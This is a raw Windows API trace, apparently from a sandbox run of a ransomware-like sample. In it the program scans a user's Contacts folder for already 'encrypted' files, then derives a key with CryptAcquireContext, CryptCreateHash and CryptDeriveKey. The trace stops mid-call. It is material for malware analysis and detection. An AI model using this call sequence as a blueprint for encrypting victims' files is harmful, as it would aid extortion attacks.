CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tacts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="acts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ts\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="\\Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Administrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="dministrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ministrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="inistrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="nistrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="istrator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="strator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="trator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ator.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tor.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="or.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="r.contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 3 [0029.189] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact\"", cchCount1=9, lpString2="encrypted", cchCount2=9) returned 1 [0029.189] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0029.189] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0029.189] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0029.190] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="t", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ct", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="act", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ntact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ontact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="contact", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0029.190] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".contact", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0029.190] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.190] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.190] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.190] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0029.190] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.190] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\Administrator.contact", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xf0fefd94, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x10b1e, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="Administrator.contact", cAlternateFileName="ADMINI~1.CON")) returned 0x7c2100 [0029.190] FindClose (in: hFindFile=0x7c2100 | out: hFindFile=0x7c2100) returned 1 [0029.190] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.190] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.190] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.190] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0029.190] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.190] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0029.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.191] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0029.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.191] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.191] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.191] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.191] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0029.191] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.191] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0029.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.378] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0029.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.378] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.378] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.378] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.379] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.379] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.379] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.379] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.379] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.379] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.380] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.380] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.380] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.380] CryptHashData (hHash=0x7c2240, pbData=0x7c75d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.380] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.381] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.381] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.381] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.381] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0029.381] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.381] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.381] CryptDeriveKey (in: hProv=0x7d5c40, Algid=0x660e, hBaseData=0x7c2240, dwFlags=0x1, phKey=0x6ae208 | out: phKey=0x6ae208*=0x7c2280) returned 1 [0029.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c22c0 | out: hHeap=0x770000) returned 1 [0029.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0029.383] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae9a8 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae9a8 | out: hHeap=0x770000) returned 1 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.383] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd18 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cd00 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccd0 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc10 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ccb8 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cbc8 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ca48 [0029.383] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c898 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c868 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab380 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b98 | out: hHeap=0x770000) returned 1 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c880 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8b0 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8f8 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c8e0 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c910 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c940 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc28 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1b98 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2e8 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b4440 [0029.384] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88cc58 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.384] PeekMessageW (in: lpMsg=0x6ae344, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae344) returned 0 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2e8 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2f8 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2f8 | out: hHeap=0x770000) returned 1 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc58 | out: hHeap=0x770000) returned 1 [0029.384] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc58 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.384] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc70 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cca0 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb98 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da308 [0029.385] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da308 [0029.385] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0029.385] CharLowerBuffW (in: 